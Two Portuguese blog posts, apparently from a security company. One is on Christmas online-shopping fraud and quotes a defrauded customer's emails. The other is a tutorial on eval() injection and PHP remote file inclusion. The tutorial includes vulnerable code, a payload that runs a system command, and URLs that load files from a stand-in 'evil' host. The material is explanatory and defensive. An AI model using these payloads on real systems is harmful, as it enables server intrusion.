É Natal! É época de fraudes…

Natal, sinônimo de consumo.
Você busca os menores preços e encontra na internet uma boa ferramenta para achá-los, mas… Você sabe onde está pisando? Será que o site onde está colocando os “pés do seu cartão de crédito” é realmente seguro? Porque onde tem grande demanda, para os vilões significa “oportunidade de ganhar dinheiro ilegalmente”.

Não foram poucos os tópicos aqui postados com reclamações de empresas que efetivamente foram criadas para fraudar consumidores, e não estamos falando de empresas que tem problemas com logística.

Assim foi a saga de muitos internautas, que esperavam passar o natal com um presente que compraram para si ou para outros. Alguns que compraram produtos para a empresa onde trabalham e agora sabendo que caíram em um golpe preocupam-se com o seu “natal”, pois certamente não será fácil.

Muitos internautas perguntam até onde vai a impunidade, outros acreditam que não há leis suficientes, outros criam grupos de discussão para os lesados na esperança de que com a troca de informações possam obter ao menos parte do prejuízo, e agora falamos de compras de R$ 27,00 e de compras de R$ 4.000,00, e de um número de usuários fraudados que ultrapassa o número de 2.000 em um único site, então não falamos de fraudes pequenas, mas de casos que quando levados a justiça deveriam ter um desfecho mais rápido.

Exemplos clássicos foram recebidos aqui no Blog, lojas que ainda em operação fraudavam usuários a todo o tempo, reclamações e denúncias sobre as lojas e relatos de conhecimento das autoridades competentes, porém o tempo de investigação aparentemente muito longo foi um dos ítens que propiciou a possibilidade das fraudes, o que deu tempo de sobra para que as quadrilhas montassem seu golpe, aplicassem por 2 MESES e depois simplesmente sumissem do lugar. Agora o mais incrível, lojas idênticas e com coincidências inacreditáveis eram abertas com outros nomes 1 semana depois, e novamente o golpe aplicado por 1 a 2 MESES e mesmo assim, apesar das inúmeras reclamações dos internautas, novamente a história se repetiu e a quadrilha “ESCAFEDEU-SE” do lugar onde estavam, geralmente conjuntos comerciais na região central velha de São Paulo.

Dizer que é apenas importante tomar cuidados quando nas compras on-line já é pouco. Existem fóruns, blogs e sites com várias dicas de segurança. A cada dia o número de fraudes aumenta e a tendência é de que isso continue.

Hoje torna-se comum ver a polícia federal prender quadrilhas que roubam senhas de usuários e com isso desviam milhões, mas precisamos agora nos atentar e nos movimentar no sentido de que torne-se comum ver a polícia prender quadrilhas que aplicam golpes fazendo-se passar por lojas de e-commerce sérias.

Finalizamos apresentando um relato que conta a SAGA da internauta lesada Rita Gunther.

POR FAVOR SOLICITO QUE A PRESENTE SEJA LIDA NO AR E SEJA TAMBÉM LEVADA AO CONHECIMENTO DA LINHA DIRETA COM A JUSTIÇA, POR SE TRATAR DE ASSUNTO DE INTERESSE DA POPULAÇÃO EM FACE AO NÚMERO DE CONSUMIDORES ELETRONICOS!!!!

1º E-mail
MICROSIGOL… A SAGA…

ATÉ QUE ME PROVEM O CONTRÁRIO, A EMPRESA SUPRA CITADA ESTÁ SE MOSTRANDO NÃO CONFIÁVEL.

2º E-mail
À MICROSIGOL:

CÓPIA NA INTEGRA DO EMAIL ENCAMINHA À MICROSIGOL ANTE A NÃO ENTREGA DE 3 PRODUTOS ADQUIRIDOS E JÁ DESCONTADA A PARCELA RELATIVA AO VALOR DESTES EM MEU CARTÃO DE CRÉDITO , FATURA DE 25/11.

RESPOSTA DA EMPRESA:

Boa tarde, Seu pedido foi confirmado dia 13/11. Após a confirmação de seu pagamento existe um prazo de até 10 dias úteis para envio de seu produto, tempo que corresponde ao processamento da demanda de produtos pelo setor de expedição, pois trabalhamos com uma cota diária de envios. Assim que seu produto for postado receberá um e-mail com o código de rastreio.

Angela Departamento de Vendas (16) 3501-1079//3501-1086
www.microsigol.com.br

3º E-mail

De: Fale Conosco –
Rita Giselda Ignarra Gunther Enviada em:
quinta-feira, 22 de novembro de 2007 11:28
Referente: Crítica
Assunto: envio de 3 notebooks

Observacao: Bom dia. Gostaria de ter informações eficiente sobre o envio de 3 notes que adquiri em 09 e 12 deste mês. Cada vez q ligo me dão informações distintas. Saliento outrossim que tendo em vista que já foi feito o recebimento da parcela correspondente, sem vcs me terem entregue o produto, há violação do Cód. do consumidor, o qual em não me sendo enviado imediatamente os produtos que estou aguardando, será acionado, além da suspensão do pagamento das demais parcelas junto ao cartão de crédito, por meio de mandado de segurança. No aguardo de providencias efetivas, Rita Gunther

Infelizmente é isso que vemos hoje e continuamos esperando que espaços como o nosso possam servir para ajudar não apenas com informações públicas, mas na diminuição desses casos.

Adicionar comentário 29 de Dezembro de 2009 às 10:16 TrustSign

Vulnerabilidades com a função eval()

A função eval() é muito utilizada por facilitar a vida de desenvolvedores transformando strings em instruções javascript e executando-as em seguida (desde que a instrução esteja correta).
Vejamos abaixo um exemplo de código javascript:

document.getElementById(”meubotaovoltar”).onclick = function () {
if (historicode1 == “home”) { //historicode1 é minha variável que recebe o valor do último item clicado
location.href=”home.htm”; //faz a chamada da página
} else if (historicode1 == “contatos”) {
location.href=”contatos.htm”
}

E a seguir o mesmo código acima porém utilizando a função eval():

document.getElementById(”meubotaovoltar”).onclick = function () {
eval(”location.href=”+historicode1+”.htm”);
}

A função minimizou totalmente o código. Por tratar o conteúdo de forma dinamica a função Eval() pode ser abusada de varias formas e um dos ataques mais difundidos é o Eval Injection.
Este ataque consiste na injeção de scripts que não são validados de forma apropriada pelo input de dados de usuário como parâmetro no site. Um usuário remoto pode inserir uma URL especialmente criada para enviar dados arbitrários para a função eval(). Isso resultará na execução do código pelo sistema vulneravel.
O ataque irá executar o código com a mesma permissão que o web service está executando no servidor remoto, isso inclui comandos executados no sistema.

Exemplo 01 : Sistema vulnerável a Eval Injection.
Vejamos o código abaixo:
$myvar = “varname”;
$x = $_GET[’arg’];
eval(”\$myvar = \$x;”);

Como pode ser visto acima a variavel $arg é repassada via parametro GET e em seguida é processada dentro da chamada eval(). Poderiamos explorar facilmente isto setando o valor da variavel para “10; system(\”/bin/passwd\”);”. Neste caso o webserver iria executar o comando no sistema e exibiria todos os usuários do Linux;

Exemplo 2: Injetando arquivos remotes para explorar a função vulnerável.
Vejamos o código a seguir:

$color = 'blue';
if ( isset( $_GET['COLOR'] ) )
$color = $_GET['COLOR'];
require( $color . '.php' );
?>

Colocando red/blue o programador pensou que poderia garantir que somente blue.php e red.php poderiam ser carregados. Porem como qualquer um poderia simplesmente inserir dados arbitrários na variável COLOR, é possivel injetar códigos a partir de arquivos:
• /vulnerable.php?COLOR=http://evil/exploit : Isto injetaria um arquivo remoto malicioso
• /vulnerable.php?COLOR=C:\ftp\upload\exploit : Isto poderia carregar um arquivo que foi feito upload para o server.

Como podem ver as vulnerabilidades relacionadas a dados inseridos como variáveis não validadas podem trazer diversos problemas, em especial a função eval() por ser utilizada em larga escala pode prejudicar consideravelmente a segurança de sua aplicação e servidores.

Adicionar comentário 14 de Dezembro de 2009 às 11:59 TrustSign